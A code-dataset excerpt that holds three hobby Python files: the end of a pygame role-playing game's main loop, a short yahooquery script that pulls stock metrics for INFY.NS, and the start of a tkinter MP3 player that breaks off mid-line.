hits[0].enter_vehicle(self.player)\n self.message_text = False\n elif len(self.companions.sprites()) > 0:\n self.message_text = False\n is_felius = False\n for companion in self.companions:\n if companion.name == 'Felius':\n is_felius = True\n if is_felius:\n hits[0].enter_vehicle(self.player)\n else:\n self.message = \"You need a key to operate this vehicle.\"\n else:\n hits[0].enter_vehicle(self.player)\n else:\n self.player.swimming = False\n self.player.in_shallows = False\n self.player.in_grass = False\n\n\n \"\"\"\n #Moving into Player class into the melee def. It makes way more sense to check hits in there.\n # NPC or Player melee hits moving_target\n hits = pg.sprite.groupcollide(self.npc_bodies_on_screen, self.moving_targets_on_screen, False, False, melee_hit_rect)\n for body in hits:\n if body.mother.in_player_vehicle:\n pass\n for mob in hits[body]:\n if mob.immaterial:\n if body.mother.equipped[body.mother.weapon_hand]:\n if ('aetherial' not in body.mother.equipped[body.mother.weapon_hand]) or ('plasma' not in body.mother.equipped[body.mother.weapon_hand]):\n continue\n if mob.in_player_vehicle:\n continue\n elif body.mother == mob:\n continue\n elif mob in self.flying_vehicles:\n continue\n elif mob.in_vehicle:\n continue\n elif body.mother.in_vehicle: # Makes it so you can't attack your own vehicle\n if mob == body.mother.vehicle:\n continue\n if body.mother.melee_playing:\n if body.mother == self.player:\n if mob not in self.companions:\n mob.offensive = True\n mob.provoked = True\n if body.mother == self.player.possessing:\n if mob not in self.companions:\n mob.offensive = True\n mob.provoked = True\n body.mother.does_melee_damage(mob)\n \"\"\"\n\n # fire hit moving target\n hits = pg.sprite.groupcollide(self.moving_targets, self.fires_on_screen, False, False, pg.sprite.collide_circle_ratio(0.5))\n for mob in hits:\n if mob in self.occupied_vehicles:\n pass\n elif mob.in_vehicle:\n pass\n elif mob.in_player_vehicle:\n pass\n else:\n if 'dragon' not in mob.equipped['race']:\n if 'wyvern' not in mob.equipped['race']:\n for fire in hits[mob]:\n mob.gets_hit(fire.damage, 0, mob.rot - 180)\n\n # explosion hit moving target\n hits = pg.sprite.groupcollide(self.moving_targets, self.explosions, False, False, pg.sprite.collide_circle_ratio(0.5))\n for mob in hits:\n if mob in self.occupied_vehicles:\n pass\n elif mob.in_vehicle:\n pass\n elif mob.in_player_vehicle:\n pass\n else:\n for fire in hits[mob]:\n mob.gets_hit(fire.damage, 0, mob.rot - 180)\n\n # fireball hit moving target\n hits = pg.sprite.groupcollide(self.moving_targets, self.fireballs, False, False, fire_collide)\n for mob in hits:\n for bullet in hits[mob]:\n if mob in self.occupied_vehicles:\n if bullet.mother == mob.driver: # Ignores fireballs from driver\n pass\n elif bullet.mother in self.companions:\n pass\n elif mob.driver == self.player:\n if bullet.mother in self.player_group:\n pass\n else: # When enemy fireballs hit vehicle player is in.\n mob.gets_hit(bullet.damage, 0, bullet.rot)\n bullet.explode(mob)\n else: # When fireball hits non player vehicle\n mob.gets_hit(bullet.damage, 0, bullet.rot)\n bullet.explode(mob)\n elif bullet.mother != mob:\n if not mob.in_player_vehicle:\n if bullet.mother == self.player:\n mob.provoked = True\n mob.gets_hit(bullet.damage, bullet.knockback, bullet.rot)\n bullet.explode(mob)\n if bullet.mother == self.player:\n self.player.stats['marksmanship hits'] += 1\n\n # bullets hit moving_target\n hits = pg.sprite.groupcollide(self.moving_targets, self.bullets, False, False, pg.sprite.collide_circle_ratio(0.5))\n for mob in hits:\n for bullet in hits[mob]:\n if mob in self.occupied_vehicles:\n if bullet.mother == mob.driver: # Ignores bullet from driver that hit vehicle\n pass\n elif bullet.mother in self.companions:\n pass\n elif bullet.mother in self.turrets: # Ignores bullets from turrets of vehicle that's shooting\n if bullet.mother.mother == mob:\n pass\n elif mob.driver == self.player:\n if bullet.mother in self.player_group:\n pass\n else: # When enemy bullet hit vehicle player is in.\n mob.gets_hit(bullet.damage, 0, bullet.rot)\n bullet.death(mob)\n else: # When bullet hits non player vehicle\n mob.gets_hit(bullet.damage, 0, bullet.rot)\n bullet.death(mob)\n elif bullet.mother != mob:\n if not mob.immaterial or bullet.energy:\n if not mob.in_player_vehicle:\n if mob != self.player:\n if bullet.mother == self.player: # Makes it so NPCs attack you if you shoot them.\n #if mob.aggression in ['awd', 'sap', 'fup']:\n # mob.offensive = True\n # mob.provoked = True\n mob.gets_hit(bullet.damage, bullet.knockback, bullet.rot)\n self.hud_mobhp = mob.stats['health'] / mob.stats['max health']\n self.show_mobhp = True\n self.last_mobhp_update = pg.time.get_ticks()\n bullet.death(mob)\n else:\n mob.gets_hit(bullet.damage, bullet.knockback, bullet.rot)\n bullet.death(mob)\n else:\n if not mob.immaterial or bullet.energy:\n if not mob.immaterial or bullet.energy:\n mob.gets_hit(bullet.damage, bullet.knockback, bullet.rot)\n bullet.death(mob)\n if bullet.mother == self.player:\n mob.provoked = True\n self.player.stats['marksmanship hits'] += 1\n\n\n\n \"\"\"\n # mob hit elevation object\n hits = pg.sprite.groupcollide(self.mobs_on_screen, self.elevations_on_screen, False, False)\n for mob in self.mobs_on_screen:\n if mob in hits:\n for elev in hits[mob]: # Makes it so NPCs can climb and jump.\n if elev.elevation - mob.elevation > 2:\n if (not mob.flying) and (mob in self.animals_on_screen):\n mob.hit_wall = True\n mob.last_wall_hit = pg.time.get_ticks()\n mob.seek_random_target()\n elif (mob in self.companions) or mob.target == self.player:\n mob.running = False\n mob.climbing = True\n mob.last_climb = pg.time.get_ticks()\n elif mob in self.npcs_on_screen:\n chance = randrange(0, 600)\n if chance == 1:\n mob.climbing = True\n else:\n mob.hit_wall = True\n mob.last_wall_hit = pg.time.get_ticks()\n mob.seek_random_target()\n elif elev.elevation - mob.elevation > 1:\n if (not mob.flying) and (mob in self.animals_on_screen):\n mob.hit_wall = True\n elif (mob in self.companions) or mob.target == self.player:\n mob.jumping = True\n mob.last_climb = pg.time.get_ticks()\n elif mob in self.npcs_on_screen:\n chance = randrange(0, 200)\n if chance == 1:\n mob.jumping = True\n else:\n mob.hit_wall = True\n mob.last_wall_hit = pg.time.get_ticks()\n mob.seek_random_target()\n else:\n mob.climbing = False\n if not mob.jumping:\n if mob.elevation > 1:\n mob.falling = True\n mob.pre_jump()\n mob.elevation = 0\n \n # fireball hits firepit\n hits = pg.sprite.groupcollide(self.firepits, self.fireballs, False, False, fire_collide)\n for item in hits:\n for bullet in hits[item]:\n if not item.lit:\n bullet.explode(item)\n item.lit = True\n center = vec(item.rect.center)\n Stationary_Animated(self, center, 'fire')\n #Work_Station(self, center.x - self.map.tile_size/2, center.y - self.map.tile_size/2, self.map.tile_size, self.map.tile_size, 'cooking fire')\n # fire hits firepit\n hits = pg.sprite.groupcollide(self.firepits, self.fires_on_screen, False, False, pg.sprite.collide_circle_ratio(0.5))\n for item in hits:\n if not item.lit:\n item.lit = True\n center = vec(item.rect.center)\n Stationary_Animated(self, center, 'fire')\n #Work_Station(self, center.x - self.map.tile_size/2, center.y - self.map.tile_size/2, self.map.tile_size, self.map.tile_size, 'cooking fire')\n\n\n # vehicle hit breakable\n hits = pg.sprite.groupcollide(self.breakable_on_screen, self.vehicles_on_screen, False, False, vehicle_collide_any)\n for breakable in hits:\n for vehicle in hits[breakable]:\n if not vehicle.flying:\n breakable.gets_hit(vehicle.cat, 0, 0, 0)\n\n # explosion hit breakable\n hits = pg.sprite.groupcollide(self.breakable_on_screen, self.explosions, False, False, pg.sprite.collide_circle_ratio(0.5))\n for breakable in hits:\n for exp in hits[breakable]:\n if exp.damage > 200:\n breakable.gets_hit('explosion', 0, 0, 0)\n \n # fireball hits firepot\n hits = pg.sprite.groupcollide(self.firepots, self.fireballs, False, False, fire_collide)\n for pot in hits:\n pot.hit = True\n for bullet in hits[pot]:\n bullet.explode()\n self.player.stats['marksmanship hits'] += 1\n\n # dropped item hit water\n hits = pg.sprite.groupcollide(self.dropped_items_on_screen, self.water_on_screen, False, False)\n for hit in hits:\n if 'dead' in hit.item and 'fish' in hit.item:\n if hit.dropped_fish:\n animal_dict = self.animals_dict[hit.item[5:]]\n animal_name = animal_dict['name']\n Animal(self, hit.pos.x, hit.pos.y, animal_name)\n hit.kill()\n elif not hit.floats:\n hit.kill()\n\n # detectable hit detector\n hits = pg.sprite.groupcollide(self.detectors, self.detectables, False, False)\n for detector in hits:\n if not detector.detected:\n for detectable in hits[detector]:\n if detector.item in detectable.name:\n detector.trigger(detectable)\n if detector.kill_item:\n detectable.kill()\n\n # npc hits doors and opens them\n hits = pg.sprite.groupcollide(self.npcs_on_screen, self.entryways_on_screen, False, False, entryway_collide)\n for npc in hits:\n for entryway in hits[npc]:\n if not entryway.locked:\n if not entryway.opened:\n entryway.open = True\n entryway.close = False\n elif npc.target in self.entryways_on_screen:\n if not entryway.open:\n entryway.close = True\n\n # land vehicle hits water\n hits = pg.sprite.groupcollide(self.land_vehicles, self.water_on_screen, False, False)\n for vcle in hits:\n vcle.gets_hit(2, 0, 0)\n\n # npc hit AI path\n hits = pg.sprite.groupcollide(self.npcs_on_screen, self.aipaths, False, False)\n for npc in self.npcs_on_screen:\n if npc in hits:\n now = pg.time.get_ticks()\n if now - npc.last_path_change > 3000:\n npc.aipath = hits[npc] #sets aipath to list of paths hit\n else:\n npc.aipath = None\"\"\"\n\n def render_lighting(self, underworld = False):\n for sprite in self.sprites_on_screen:\n if sprite in self.lights:\n self.lights_on_screen.add(sprite)\n\n # draw the light mask (gradient) onto fog image\n if self.underworld:\n self.fog.fill((180, 180, 180))\n else:\n self.fog.fill(self.dark_color)\n\n # tile_based flame lights\n xi, xf, yi, yf = self.map.get_tiles_on_screen(self.player.pos.x, self.player.pos.y)\n for y in range(yi, yf):\n for x in range(xi, xf):\n # When you are outside, lights inside should be off, otherwise all lights should be on.\n if self.map.stored_map_data.lights[y][x]:\n if (not self.player_inside and not ('roof' in self.map.tile_props[y][x] and (self.map.tile_props[y][x]['roof'] != ''))) or self.player_inside and (('roof' in self.map.tile_props[y][x] and (self.map.tile_props[y][x]['roof'] != ''))): # Prevents drawing lights inside houses so they don't shine through roofs when you are outside.\n if self.map.stored_map_data.lights[y][x] == 'flame':\n light_mask = self.flame_light_mask\n light_mask_rect = self.flame_light_mask_rect\n elif self.map.stored_map_data.lights[y][x] == 'coals':\n light_mask = self.coals_light_mask\n light_mask_rect = self.coals_light_mask_rect\n elif self.map.stored_map_data.lights[y][x] == 'candle':\n light_mask = self.candle_light_mask\n light_mask_rect = self.candle_light_mask_rect\n light_mask_rect.center = (x * self.map.tile_size + self.map.tile_size/2, y * self.map.tile_size + self.map.tile_size/2)\n lightrect = self.camera.apply_rect(light_mask_rect)\n self.fog.blit(light_mask, lightrect)\n\n for light in self.lights_on_screen:\n x, y = self.map.get_tile_pos(light.pos.x, light.pos.y)\n if (light == self.player) or (not self.player_inside and not ('roof' in self.map.tile_props[y][x] and (self.map.tile_props[y][x]['roof'] != ''))) or self.player_inside and (('roof' in self.map.tile_props[y][x] and (self.map.tile_props[y][x]['roof'] != ''))): # Prevents drawing lights inside houses so they don't shine through roofs.\n lightrect = self.camera.apply_rect(light.light_mask_rect)\n self.fog.blit(light.light_mask, lightrect)\n\n self.screen.blit(self.fog, (0, 0), special_flags=pg.BLEND_RGB_SUB)\n\n def rot_center(self, image, angle):\n orig_rect = image.get_rect()\n rot_image = pg.transform.rotate(image, angle)\n rot_rect = orig_rect.copy()\n rot_rect.center = rot_image.get_rect().center\n rot_image = rot_image.subsurface(rot_rect).copy()\n return rot_image\n\n def draw_minimap(self):\n mini_rect = pg.Rect((self.screen_width - self.map.minimap.rect.width), 0, self.map.minimap.rect.width, self.map.minimap.rect.height)\n width = self.screen_width - self.map.minimap.rect.width\n scale = self.map.minimap.rect.width / self.map.width\n map_pos = vec(self.player.rect.center) * scale\n pos_rect = pg.Rect(0, 0, 20, 20)\n pos_rect.center = (int(map_pos.x + width), int(map_pos.y))\n temp_compass_img = self.rot_center(self.compass_image.copy(), self.compass_rot)\n self.screen.blit(self.map.minimap.image, (width, 0))\n self.screen.blit(temp_compass_img, (width - self.map.tile_size, 0))\n pg.draw.rect(self.screen, WHITE, mini_rect, 2)\n pg.draw.rect(self.screen, YELLOW, pos_rect, 1)\n\n def draw_overmap(self):\n cell_width = self.screen_height / len(self.map_data_list[0])\n cell_height = self.screen_height / len(self.map_data_list)\n offsetx = int(self.world_location.x * cell_width)\n offsety = int(self.world_location.y * cell_height)\n scalex = cell_width / self.map.width\n scaley = cell_height / self.map.height\n currentmap_rect = pg.Rect(0, 0, cell_width, cell_height)\n currentmap_rect.topleft = (offsetx, offsety)\n map_pos = vec(self.player.rect.centerx * scalex, self.player.rect.centery * scaley)\n pos_rect = pg.Rect(0, 0, 3, 3)\n pos_rect.center = (int(map_pos.x + offsetx), int(map_pos.y + offsety))\n self.screen.blit(self.over_minimap_image, (0, 0))\n pg.draw.rect(self.screen, YELLOW, currentmap_rect, 4)\n pg.draw.rect(self.screen, RED, pos_rect, 4)\n\n\n def draw(self):\n pg.display.set_caption(\"Legends of Zhara\")\n #self.group.draw(self.screen, self) # Used with my monkey patched version of the old pyscroll.\n self.group.draw(self.screen)\n\n # Only draws roofs when outside of buildings\n hits = pg.sprite.spritecollide(self.player, self.inside_on_screen, False)\n if not (hits or self.player.inside):\n self.player_inside = False\n else:\n self.player_inside = True\n if self.player.in_vehicle:\n if self.player.vehicle in self.flying_vehicles:\n self.player_inside = False\n\n # Draws flying vehicle sprites after roves.\n #for sprite in self.flying_vehicles:\n # self.screen.blit(sprite.image, self.camera.apply(sprite))\n\n if self.underworld:\n self.render_lighting(True)\n elif True in [self.night, self.sunrise, self.nightfall]:\n self.render_lighting()\n #if self.hud_map:\n # self.draw_minimap()\n if self.hud_overmap:\n self.draw_overmap()\n\n if self.draw_debug: # Draws hit rects for debugging\n #for wall_rect in self.map.walls_list:\n # pg.draw.rect(self.screen, CYAN, self.camera.apply_rect(wall_rect), 1)\n for ai in self.ais:\n for i, path in enumerate(ai.found_path):\n pathrect = pg.Rect(path.pos[0] * self.map.tile_size, path.pos[1] * self.map.tile_size, self.map.tile_size, self.map.tile_size)\n pg.draw.rect(self.screen, RED, self.camera.apply_rect(pathrect), 1)\n if ai.meander:\n pathrect = pg.Rect(ai.temp_target[0] * self.map.tile_size, ai.temp_target[1] * self.map.tile_size, self.map.tile_size,\n self.map.tile_size)\n pg.draw.rect(self.screen, RED, self.camera.apply_rect(pathrect), 1)\n for vehicle in self.vehicles_on_screen:\n pg.draw.rect(self.screen, CYAN, self.camera.apply_rect(vehicle.hit_rect), 1)\n pg.draw.rect(self.screen, GREEN, self.camera.apply_rect(vehicle.hit_rect2), 1)\n pg.draw.rect(self.screen, RED, self.camera.apply_rect(vehicle.hit_rect3), 1)\n for mob in self.mobs_on_screen:\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(mob.hit_rect), 1)\n for item in self.dropped_items:\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(item.hit_rect), 1)\n #for npc in self.npcs_on_screen:\n # pg.draw.rect(self.screen, WHITE, self.camera.apply_rect(npc.temp_target.hit_rect), 1)\n for target in self.random_targets:\n pg.draw.rect(self.screen, BLUE, self.camera.apply_rect(target.rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.hit_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.mid_weapon_melee_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.weapon_melee_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.melee_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.mid_weapon2_melee_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.weapon2_melee_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.melee2_rect), 1)\n #for elev in self.elevations_on_screen:\n # pg.draw.rect(self.screen, BLUE, self.camera.apply_rect(elev.rect), 1)\n\n self.inventory_hud_icons.draw(self.screen)\n if self.selected_hud_item:\n pg.draw.rect(self.screen, YELLOW, self.selected_hud_item.rect, 1)\n\n if ('type' in self.player.hand2_item) and (self.player.hand2_item['type'] == 'block') or ('type' in self.player.hand_item) and (self.player.hand_item['type'] == 'block'):\n x, y = get_next_tile_pos(self.player)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(pg.Rect(x * self.map.tile_size, y * self.map.tile_size, self.map.tile_size, self.map.tile_size)), 1)\n\n # HUD functions\n draw_player_stats(self.screen, 10, 10, self.hud_health)\n draw_player_stats(self.screen, 10, 40, self.hud_stamina, BLUE)\n draw_player_stats(self.screen, 10, 70, self.hud_magica, CYAN)\n if self.show_mobhp:\n draw_player_stats(self.screen, int(self.screen_width/2 - 150), self.screen_height - 70, self.hud_mobhp, BLUE, 300)\n if self.player.hungers:\n draw_player_stats(self.screen, 10, 100, self.hud_hunger, BROWN)\n self.draw_text(\"HGR {:.0f}\".format(self.player.stats['hunger']), self.hud_font, 20, WHITE, 120, 100, align=\"topleft\")\n draw_crosshair = False\n if self.hud_ammo1 != '':\n self.draw_text(self.hud_ammo1, self.hud_font, 20, WHITE, 50, self.screen_height - 100, align=\"topleft\")\n draw_crosshair = True\n if self.hud_ammo2 != '':\n self.draw_text(self.hud_ammo2, self.hud_font, 20, WHITE, 50, self.screen_height - 50, align=\"topleft\")\n draw_crosshair = True\n if draw_crosshair:\n pg.mouse.set_visible(False)\n mouse_pos = pg.mouse.get_pos()\n self.screen.blit(self.crosshair_image, (mouse_pos[0] - self.crosshair_offset, mouse_pos[1] - self.crosshair_offset))\n elif not pg.mouse.get_visible():\n pg.mouse.set_visible(True)\n if self.paused:\n self.screen.blit(self.dim_screen, (0, 0))\n self.draw_text(\"Paused\", self.title_font, 105, RED, self.screen_width / 2, self.screen_height / 2, align=\"center\")\n if self.message_text == True:\n self.draw_text(self.message, self.hud_font, 30, WHITE, self.screen_width / 2, self.screen_height / 2 + 100, align=\"center\")\n self.draw_text(\"FPS {:.0f}\".format(1/self.dt), self.hud_font, 20, WHITE, self.screen_width/2, 10, align=\"topleft\")\n self.draw_text(\"HP {:.0f}\".format(self.hud_health_stats['health']), self.hud_font, 20, WHITE, 120, 10, align=\"topleft\")\n self.draw_text(\"ST {:.0f}\".format(self.player.stats['stamina']), self.hud_font, 20, WHITE, 120, 40, align=\"topleft\")\n self.draw_text(\"MP {:.0f}\".format(self.player.stats['magica']), self.hud_font, 20, WHITE, 120, 70, align=\"topleft\")\n\n pg.display.flip()\n self.wt = self.beg + (1 / FPS)\n while (perf_counter() < self.wt):\n pass\n self.dt = perf_counter() - self.beg\n if self.dt > 0.2: # Caps dt at 200 ms.\n self.dt = 0.2\n self.beg = perf_counter()\n if self.in_lock_menu:\n self.lock_menu.update()\n if self.in_dialogue_menu:\n self.dialogue_menu.update()\n\n def change_right_equipped(self, slot):\n self.player.empty_mags() # unloads old weapon\n self.player.hand_item = self.player.equipped[slot]\n if ('type' in self.player.hand_item) and (self.player.hand_item['type'] in WEAPON_TYPES):\n self.player.equipped['weapons'] = self.player.hand_item\n else:\n self.player.equipped['weapons'] = None\n for icon in self.inventory_hud_icons:\n if int(icon.slot_text) == slot + 1:\n self.selected_hud_item = icon\n self.player.lamp_check()\n self.player.human_body.update_animations() # Updates animations for newly equipped or removed weapons etc.\n self.player.dragon_body.update_animations()\n self.player.pre_reload() # reloads new weapon\n\n def use_item(self, slot):\n self.change_right_equipped(slot)\n self.player.use_item(self.selected_hud_item.item, slot)\n\n def place_item(self):\n if self.selected_hud_item:\n slot = int(self.selected_hud_item.slot_text) - 1\n self.player.place_item(slot)\n\n def events(self):\n # catch all events here\n for event in pg.event.get():\n if event.type == pg.QUIT:\n self.quit()\n # Shooting/attacking\n if event.type == pg.MOUSEBUTTONDOWN:\n pos = pg.mouse.get_pos()\n # get a list of all heading sprites that are under the mouse cursor\n self.clicked_sprites = [s for s in self.inventory_hud_icons if s.rect.collidepoint(pos)]\n if self.clicked_sprites:\n if pg.mouse.get_pressed() == (1, 0, 0):\n self.change_right_equipped(int(self.clicked_sprites[0].slot_text) - 1)\n elif pg.mouse.get_pressed() == (0, 0, 1):\n self.use_item(int(self.clicked_sprites[0].slot_text) - 1)\n if pg.mouse.get_pressed() == (1, 0, 1):\n self.player.dual_shoot()\n elif pg.mouse.get_pressed() == (0, 0, 1) or pg.mouse.get_pressed() == (0, 1, 1):\n if ('type' in self.player.hand_item) and (self.player.hand_item['type'] == 'block'):\n self.player.place_block(1)\n elif ('type' in self.player.hand_item) and (self.player.hand_item['type'] == 'magic'):\n self.player.weapon_hand = 'weapons'\n self.player.cast_spell(self.player.hand_item)\n else:\n self.player.weapon_hand = 'weapons'\n self.player.shoot()\n elif pg.mouse.get_pressed() == (1, 0, 0) or pg.mouse.get_pressed() == (1, 1, 0):\n if ('type' in self.player.hand2_item) and (self.player.hand2_item['type'] == 'block'):\n self.player.place_block(2)\n elif ('type' in self.player.hand2_item) and (self.player.hand2_item['type'] == 'magic'):\n self.player.weapon_hand = 'weapons2'\n self.player.cast_spell(self.player.hand2_item)\n else:\n self.player.weapon_hand = 'weapons2'\n self.player.shoot()\n else: # Prevents e_down from getting stuck on true\n self.player.e_down = False\n if event.type == pg.MOUSEBUTTONUP: # Updates which hand should be attacking when mouse buttons change.\n if pg.mouse.get_pressed() == (0, 0, 1) or pg.mouse.get_pressed() == (0, 1, 1):\n self.player.weapon_hand = 'weapons'\n elif pg.mouse.get_pressed() == (1, 0, 0) or pg.mouse.get_pressed() == (1, 1, 0):\n self.player.weapon_hand = 'weapons2'\n else: # Prevents e_down from getting stuck on true\n self.player.e_down = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_1:\n self.change_right_equipped(0)\n elif event.key == pg.K_2:\n self.change_right_equipped(1)\n elif event.key == pg.K_3:\n self.change_right_equipped(2)\n elif event.key == pg.K_4:\n self.change_right_equipped(3)\n elif event.key == pg.K_5:\n self.change_right_equipped(4)\n elif event.key == pg.K_6:\n self.change_right_equipped(5)\n if event.key == pg.K_ESCAPE:\n MainMenu(self, self.player, 'Game')\n if event.key == self.key_map['inventory']:\n self.player.empty_mags() # This makes sure the bullets in your clip don't transfer to the wrong weapons if you switch weapons in your inventory\n MainMenu(self, self.player)\n if event.key == self.key_map['interact']:\n self.player.e_down = True\n else:\n self.player.e_down = False\n #if event.key == pg.K_BACKQUOTE: # Switches to last weapon\n # self.player.toggle_previous_weapons()\n if event.key == self.key_map['reload']:\n self.player.pre_reload()\n if event.key == self.key_map['hitbox']:\n self.draw_debug = not self.draw_debug\n if event.key == self.key_map['pause']:\n trace_mem()\n self.paused = not self.paused\n self.beg = perf_counter() # resets dt.\n if event.key == pg.K_EQUALS:\n self.map.minimap.resize()\n if event.key == pg.K_MINUS:\n self.map.minimap.resize(False)\n if event.key == self.key_map['minimap']: # Toggles hud mini map\n self.hud_map = not self.hud_map\n if event.key == self.key_map['place']:\n self.place_item()\n if event.key == self.key_map['block']:\n self.player.place_block()\n if event.key == self.key_map['grenade']:\n self.player.throw_grenade()\n if event.key == self.key_map['transform']:\n if self.player.possessing == None:\n self.player.transform()\n else:\n self.player.possessing.depossess()\n\n if event.key == self.key_map['fire']:\n if self.player.dragon:\n self.player.breathe_fire()\n if event.key == self.key_map['lamp']:\n self.player.light_on = not self.player.light_on\n if event.key == self.key_map['up']:\n if self.player.in_vehicle:\n if self.player.vehicle in self.flying_vehicles:\n self.fly_menu = Fly_Menu(self)\n if event.key == pg.K_RETURN: # Toggles fullscreen mode when you press ALT+ENTER\n if event.mod & pg.KMOD_ALT:\n self.flags ^= pg.FULLSCREEN\n if self.flags & pg.FULLSCREEN:\n self.screen_height = HEIGHT\n else:\n self.screen_height = HEIGHT\n pg.display.set_mode((self.screen_width, self.screen_height), self.flags)\n if event.key == pg.K_s: # Saves game\n if event.mod & pg.KMOD_CTRL:\n self.save()\n if event.key == pg.K_l: # loads game\n if event.mod & pg.KMOD_CTRL:\n pass\n if event.key == self.key_map['jump']:\n self.player.pre_jump()\n\n def show_go_screen(self):\n self.screen.fill(BLACK)\n self.draw_text(\"GAME OVER\", self.title_font, 100, RED,\n self.screen_width / 2, self.screen_height / 2, align=\"center\")\n self.draw_text(\"Press Escape to quit, C to continue or N to start a new game.\", self.script_font, 16, WHITE,\n self.screen_width / 2, self.screen_height * 3 / 4, align=\"center\")\n pg.display.flip()\n self.wait_for_key()\n self.garbage_collect()\n\n def wait_for_key(self):\n pg.event.wait()\n waiting = True\n while waiting:\n self.clock.tick(FPS)\n for event in pg.event.get():\n if event.type == pg.QUIT:\n waiting = False\n self.quit()\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_ESCAPE:\n waiting = False\n self.quit()\n elif event.key == pg.K_c:\n waiting = False\n self.player.stats['health'] = self.player.stats['max health']\n #self.in_load_menu = True\n self.run()\n elif event.key == pg.K_n:\n waiting = False\n\n# create the game object\ng = Game()\nwhile True:\n g.new()\n g.run()\n g.show_go_screen()\n","repo_name":"ravenironwing/Sky-Realm-Legends-of-Arroshay","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":138567,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"3480200011","text":"symbol = \"INFY.NS\"\n\nfrom yahooquery import Ticker\nimport pandas as pd\nimport streamlit as st\n\nstock1 = Ticker(symbol)\nModules = stock1.all_modules\nQuotes = stock1.quotes\nFin_Data = stock1.financial_data\nSum_Data = stock1.summary_detail\n\ndf = pd.DataFrame(columns = ['Market Cap', 'EPS'])\n\ncur = Quotes[symbol]['currency']\n#st.header(\"Market Currency:\")\n#st.subheader(cur)\n#st.caption(\"All metrics will be in this currency\")\n\nname = Quotes[symbol]['longName']\n\nsector = Modules[symbol]['assetProfile']['sector']\n\n\nmarket_cap = (Sum_Data[symbol]['marketCap'])\nmarket_cap = round(market_cap)\n\neps = Quotes[symbol]['epsTrailingTwelveMonths']\neps = round(eps,2)\n\nroe = Fin_Data[symbol]['returnOnEquity']*100\nroe = round(roe,2)\n\n\npe = Quotes[symbol]['trailingPE']\npe = round(pe,2)\n\n\ndte = Fin_Data[symbol]['debtToEquity']\ndte = round(dte,2)\n\n\npb = Quotes[symbol]['priceToBook']\npb = round(pb,2)\n\n\nps = Sum_Data[symbol]['priceToSalesTrailing12Months']\nps = round(ps,2)\n\npeg = Modules[symbol]['indexTrend']['pegRatio']\npeg = round(peg,2)\n \n\ncr = Fin_Data[symbol]['currentRatio']\ncr = round(cr,2)\n\n\ntry:\n dy = Sum_Data[symbol]['dividendYield']*100\n dy = round(dy,2)\nexcept KeyError:\n dy = Sum_Data[symbol]['dividendYield'] = \"n/A\"\n\ninsiders = Modules[symbol]['defaultKeyStatistics']['heldPercentInsiders']*100\ninsiders = round(insiders,2)\n\nprint(Quotes)","repo_name":"ManavMuthanna/invEZt","sub_path":"details.py","file_name":"details.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37689766600","text":"from tkinter import*\r\nimport pygame, sys\r\nfrom pygame.locals import*\r\nfrom tkinter import filedialog\r\nfrom PIL import ImageTk, Image\r\nimport os\r\n\r\npygame.init() #Iniciamos modulo de Pygame\r\n#Funcion abrir cancion\r\ndef abrirarchivo():\r\n cancion = filedialog.askopenfilename() #Guardar el nombre de la cancion\r\n print(cancion)\r\n pygame.mixer.music.load(cancion)\r\n\r\ndef playsong():\r\n pygame.mixer.music.play()\r\n\r\ndef stop():\r\n pygame.mixer.music.stop()\r\n\r\ndef pause():\r\n pygame.mixer.music.pause()\r\n\r\ndef resume():\r\n pygame.mixer.music.unpause()\r\n\r\ndef volmas():\r\n VolUp = pygame.mixer.music.get_volume()+0.5\r\n print(volmas)\r\n pygame.mixer.music.set_volume(VolUp)\r\n\r\n\r\ndef volMenos():\r\n VolLow = pygame.mixer.music.get_volume()-0.5\r\n print(volmas)\r\n pygame.mixer.music.set_volume(VolLow)\r\n\r\n\r\nraiz = Tk() #Instanciar con objeto Tk\r\nraiz.title(\"Reproductor MP3 _ GUI\") #Asigna el titulo de la ventana\r\n#raiz.iconbitmap(\"disk-jockey.ico\")\r\nraiz.geometry(\"500x500\")\r\nraiz.resizable(0,0)\r\n\r\n# Crear fream\r\nframePrincipal = Frame(raiz,bg=\"#4A4A4A\")\r\nframePrincipal.pack(fill=\"both\",expand=1) #FBFBFB \r\n#Etiqueta Titulo para el reproductor #bold es par negritas\r\ntituloReproductor = Label(framePrincipal, text=\"ROCOLA KOMANDER\", font=(\"Roboto\",30,\"bold\"),bg=\"#4A4A4A\",fg=\"#FBFBFB\")\r\ntituloReproductor.place(relx=0.12,rely=0.3)\r\n#HACER LOS BOTONES Boton de abror el son 1 fONT PARA CAMBIAR LA FUENTE\r\nbotonOpenSong = Button(framePrincipal,text=\"Open Song\",bg=\"#42AB49\",fg=\"#FBFBFB\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=abrirarchivo)\r\nbotonOpenSong.place(relx=0.1,rely=0.5)\r\n#Boton Play Song 2\r\nbotonPLaySong = Button(framePrincipal,text=\"Puchale pley\",bg=\"#1DD4AA\",fg=\"#FBFBFB\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=playsong)\r\nbotonPLaySong.place(relx=0.1,rely=0.8)\r\n#Stop 3\r\nbotonStop = Button(framePrincipal,text=\"Stop\",bg=\"#1DD4AA\",fg=\"#FBFBFB\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=stop)\r\nbotonStop.place(relx=0.6,rely=0.5)\r\n#Resume 4\r\nbotonResume = 